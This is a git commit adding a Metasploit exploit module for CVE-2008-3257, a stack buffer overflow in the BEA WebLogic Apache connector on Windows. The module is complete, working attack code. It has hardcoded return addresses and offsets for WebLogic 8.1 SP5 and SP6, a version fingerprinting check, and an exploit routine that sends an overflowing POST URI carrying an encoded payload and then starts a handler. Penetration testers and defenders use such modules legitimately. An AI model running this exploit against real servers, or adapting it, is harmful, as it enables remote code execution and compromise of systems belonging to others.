Added module for CVE-2008-3257

2012-05-17 10:28:18 +02:00 · 2012-05-17 10:28:18 +02:00 · 445bd90afb
parent a88af1dd36
commit 445bd90afb
1 changed files with 173 additions and 0 deletions
--- a/modules/exploits/windows/http/bea_weblogic_post_bof.rb
+++ b/modules/exploits/windows/http/bea_weblogic_post_bof.rb
@ -0,0 +1,173 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = GreatRanking
+
+	HttpFingerprint = { :pattern => [ /Apache/ ] }
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Oracle Weblogic Apache Connector POST Request Buffer Overflow',
+			'Description'    => %q{
+					This module exploits a stack based buffer overflow in the BEA
+				Weblogic Apache plugin.
+
+				The connector fails to properly handle specially crafted HTTP POST
+				requests resulting in a buffer overflow due to the insecure usage
+				of sprintf.
+
+				At this moment this module works over Windows systems without DEP
+				and has been tested with Windows 2000 / XP.
+			},
+			'Author'         =>
+				[
+					'KingCope', # Vulnerability Discovery and PoC
+					'juan vazquez', # Metasploit Module
+				],
+			'Version'        => '$Revision: $',
+			'References'     =>
+				[
+					[ 'CVE', '2008-3257' ],
+					[ 'OSVDB', '47096' ],
+					[ 'BID', '30273' ]
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+				},
+			'Privileged'     => true,
+			'Platform'       => 'win',
+			'Payload'        =>
+				{
+					'Space'    => 4000,
+					'BadChars' => "\x00\x0d\x0a\x3f"
+				},
+			'Targets'        =>
+				[
+					[ 'Automatic', {} ],
+					[  'BEA WebLogic 8.1 SP6 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
+						{
+							'Ret' => 0x10061f63, # push esp # ret # mod_wl_20.so
+							'Offset' =>  4102
+						}
+					],
+					[  'BEA WebLogic 8.1 SP5 - mod_wl_20.so / Apache 2.0 / Windows [XP/2000]',
+						{
+							'Ret' => 0x10061473, # push esp # ret # mod_wl_20.so
+							'Offset' =>  4102
+						}
+					],
+				],
+			'DisclosureDate' => 'Jul 17 2008',
+			'DefaultTarget'  => 0))
+
+		register_options(
+			[
+				OptString.new('PATH', [ true,  "The URI path to a jsp or object provided by Weblogic", '/index.jsp'])
+			], self.class)
+
+	end
+
+	def check
+
+		res = send_request_cgi(
+			{
+				'method'  => 'POST',
+				'uri'     => datastore['PATH'],
+				'headers'	=>
+					{
+						'Content-Length'		=> -1
+					}
+			})
+
+		if res and res.code == 500
+
+			# BEA WebLogic 8.1 SP6 - mod_wl_20.so
+			if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
+					res.body =~ /Change Number:<\/B> <I>779586/
+				return Exploit::CheckCode::Vulnerable
+			end
+
+			# BEA WebLogic 8.1 SP5 - mod_wl_20.so
+			if res.body =~ /Build date\/time:<\/B> <I>Aug  5 2005 11:19:57/ and
+					res.body =~ /Change Number:<\/B> <I>616810/
+				return Exploit::CheckCode::Vulnerable
+			end
+			# Check for dates prior to patch release
+			if res.body =~ /([A-Za-z]{3} [\s\d]{2} [\d]{4})/
+				build_date = Date.parse($1)
+				if build_date <= Date.parse("Jul 28 2008")
+					return Exploit::CheckCode::Appears
+				end
+			end
+
+		end
+
+		return Exploit::CheckCode::Safe
+	end
+
+	def exploit
+
+		# Autodetect BEA mod_wl version
+		my_target = get_target
+
+		# Avoid the attack if the victim doesn't have the same setup we're targeting
+		if my_target.nil?
+			print_error("BEA mod_weblogic not supported")
+			return
+		end
+
+		uri = datastore['PATH']
+		sploit = rand_text_alphanumeric(my_target['Offset']-uri.length)
+		sploit << [my_target.ret].pack("V")
+		sploit << payload.encoded
+
+		send_request_cgi(
+			{
+				'method'  => 'POST',
+				'uri'     => "#{uri} #{sploit}",
+			})
+
+		handler
+
+	end
+
+	def get_target
+
+		return target if target.name != 'Automatic'
+
+		res = send_request_cgi(
+						{
+							'method'  => 'POST',
+							'uri'     => datastore['PATH'],
+							'headers'	=>
+								{
+									'Content-Length'		=> -1
+								}
+						})
+
+		if res and res.code == 500
+			# BEA WebLogic 8.1 SP6 - mod_wl_20.so
+			if res.body =~ /Build date\/time:<\/B> <I>Jun 16 2006 15:14:11/ and
+					res.body =~ /Change Number:<\/B> <I>779586/
+				return targets[1]
+			# BEA WebLogic 8.1 SP5 - mod_wl_20.so
+			elsif res.body =~ /Build date\/time:<\/B> <I>Aug  5 2005 11:19:57/ and
+					res.body =~ /Change Number:<\/B> <I>616810/
+				return targets[2]
+			end
+		end
+
+		return nil
+	end
+
+end